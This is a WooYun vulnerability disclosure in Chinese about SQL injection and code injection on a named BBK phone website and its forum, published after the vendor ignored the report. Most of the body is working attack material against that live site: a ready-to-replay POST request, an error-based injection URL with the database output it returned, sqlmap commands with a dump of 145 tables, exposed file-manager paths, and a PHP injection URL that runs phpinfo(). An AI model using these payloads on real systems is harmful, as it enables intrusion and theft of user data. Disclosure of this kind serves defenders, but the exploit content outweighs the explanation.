当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096961

漏洞标题:步步高某站多处注入(用户信息泄露及管理员密码)

相关厂商:步步高

漏洞作者: 千斤拨四两

提交时间:2015-02-16 22:25

修复时间:2015-04-02 22:26

公开时间:2015-04-02 22:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

存在多处sql注入点及敏感目录。

详细说明:

post注入点提交数据http头:

POST /down_soft.php? HTTP/1.1
Host: www.bbktel.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.bbktel.com.cn/down_soft.php?
Cookie: PHPSESSID=h1dpu9m881rabcr7juq64kfcm7; Isz_sid=NGN2g2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Classid=4&pro_number=&image.x=42&image.y=4


论坛一样存在注入漏洞,floor强制报错语句:

数据库版本号,用户名,数据库名称
http://www.bbktel.com.cn/bbs/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('10','11','12','\',') and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#')
Error: Duplicate entry '5.5.23-logbbktel_bbs@localhostbbk_tel1' for key 'group_key'


存在敏感目录

http://www.bbktel.com.cn/fckeditor/editor/filemanager/connectors/test.html
http://www.bbktel.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fwww.bbktel.com.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php


漏洞证明:

sqlmap.jpg


sqlmap.py -r bbg.txt -p Classid --dbs


Database: bbk_tel
[145 tables]
+----------------------------+
| bbk_acting |
| bbk_actingpower |
| bbk_actingscore |
| bbk_guest |
| bbk_tel_actives_tab |
| bbk_tel_admin_tab |
| bbk_tel_down_ad |
| bbk_tel_down_backwall |
| bbk_tel_down_screen |
| bbk_tel_guestbook |
| bbk_tel_huodong_tab |
| bbk_tel_index_pic |
| bbk_tel_network_tab |
| bbk_tel_news_tab |
| bbk_tel_news_type |
| bbk_tel_notice |
| bbk_tel_pingmian_class |
| bbk_tel_pingmian_tab |
| bbk_tel_pro_shuoming |
| bbk_tel_pro_shuoming_class |
| bbk_tel_pro_shuoming_tab |
| bbk_tel_pro_sms |
| bbk_tel_pro_soft |
| bbk_tel_product_discuss |
| bbk_tel_product_discuss_ty |
| bbk_tel_product_picture |
| bbk_tel_product_tab |
| bbk_tel_product_type |
| bbk_tel_sold_question |
| bbk_tel_sold_zhishi |
| bbk_tel_survey |
| bbk_tel_surveyprize |
| bbk_tel_system_tab |
| bbk_tel_vote |
| bbk_tel_votelog |
| bbk_tel_voteoptions |
| bbk_tel_year |
| bbk_tel_year_book |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| cdb_xreports |
| notice |
+----------------------------+


管理员账户密码:

mima.png


用户信息:

yonghuxinxi.png


敏感信息暴漏:

www.bbktel.com.cn/bbs/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}}


phpinfo.png


修复方案:

漏洞太多,慢慢修补吧。

版权声明:转载请注明来源 千斤拨四两@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝